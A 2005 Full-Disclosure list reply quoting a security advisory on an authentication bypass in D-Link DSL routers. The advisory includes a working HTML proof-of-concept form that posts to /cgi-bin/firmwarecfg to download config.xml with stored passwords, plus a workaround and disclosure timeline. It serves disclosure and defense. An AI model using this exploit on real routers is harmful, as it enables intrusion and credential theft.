Hello.
Could the D-Link DI-604 story at <http://groups-beta.google.com/group/sci.astro.seti/msg/71095063e414a3e2> be related to this vulnerability? I have myself also a DI-604 that broke down in exactly the same way as described above and the above was the only similar case I have yet found on the net. My suspicion was also that the box had been hacked and your vulnerability post now shows that exploitable holes in D-Link boxes exist. -Sebastian On Thu, 19 May 2005 16:41:56 +0200 Francesco Orro <[EMAIL PROTECTED]> wrote: > ====================== SUMMARY ======================== > > Title: D-Link DSL routers authentication bypass > Date: 19 May 2005 > Author: Francesco Orro <francesco.orro 4t akhela.com> > > Product: DSL-502T, DSL-504T, DSL-562T, DSL-G604T > Vendor: D-Link > Vendor URL: http://www.dlink.com > Vendor Status: D-Link was conctacted > Affects: Tested on DSL-502T, DSL-504T, DSL-562T, DSL-G604T with > various firmwares versions > Risk: High > Impact: Unauthorized people may gain full access to the device > > Vulnerability Description: an undocumented feature allows (in some > cases) to bypass the authentication prompt and gain full access to the > router, and than to the network behind it. > > > ====================== BACKGROUND ======================== > > D-Link DSL routers are commonly used for internet connectivity for home > or small office needs. (http://www.dlink.com/products/) > > > =============== PROBLEM DESCRIPTION ================== > > The CGI /cgi-bin/firmwarecfg, when executed, checks the existence of > the > file fw_ip under /var/tmp/. If this file exists, all IP addresses > listed > inside it are given straight access to the device, without the need for > authentication. If this file doesn't exists, the CGI creates a new one, > putting the requesting address inside. > > If the web configuration console is accessible from internet and if > nobody have never called the CGI before (es: from a workstation inside > the LAN), then everybody can gain access to the router, download the > config.xml file which contains users account and passwords, have access > to the private network, modify or alter the firmware of the router, > etc. > > > ================ ADDITIONAL DETAILS ================== > > Vulnerability was found on the following firmware versions: > > V1.00B01T16.EN.20040211 > V1.00B01T16.EU.20040217 > V0.00B01T04.UK.20040220 > V1.00B01T16.EN.20040226 > V1.00B02T02.EU.20040610 > V1.00B02T02.UK.20040618 > V1.00B02T02.EU.20040729 > V1.00B02T02.DE.20040813 > V1.00B02T02.RU.20041014 > > Can be exploited by a simple HTTP POST with the form: > > <html> > <head>Download config.xml:<title>GetConfig - Config file > download</title></head> > <body> > > <script lang="javascript"> > function invia_richiesta() > { > document.DownloadConfig.action='http://'+document.InputBox.Host. > value+'/cgi-bin/firmwarecfg'; > document.DownloadConfig.submit(); > } > </script> > > <form name="InputBox"> > <br>http://<input Name="Host" type="text" v > value="">/cgi-bin/firmwarecfg<br> > </form> > <form name="DownloadConfig" method="POST" action="" > enctype="multipart/form-data"> > <input type="Submit" name="config" value="Download" > onClick="javascript:invia_richiesta();"><br> > </form> > > </body> > </html> > > > =================== FIX INFORMATION =================== > > Actually there is no solution to problem due to the fact that it seems > an hidden feature. > The work around is to call the CGI /cgi-bin/firmwarecfg from a known > address of the local network and/or disable web console access from the > internet. > > > ================ AUTHOR INFORMATION ================ > > Francesco Orro > Akhela S.r.l. - Operation Group > http://www.akhela.com/ > > EMail: francesco.orro 4t akhela.com > KeyID: 6CF46D45 > > > =================== DISCLOSURE HISTORY ===================== > > 2 May 2005 - First private release of this advisory; > 4 May 2005 - The vendor (D-Link Mediterraneo S.r.l.) has been informed > of the vulnerability; > 5 May 2005 - The vendor replid that the problem was resolved on > firmware version V1.00B02T02.EU.20040610, but has been > demostrated that this version is vulnerable too; > 19 May 2005 - Public release of this advisory. > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
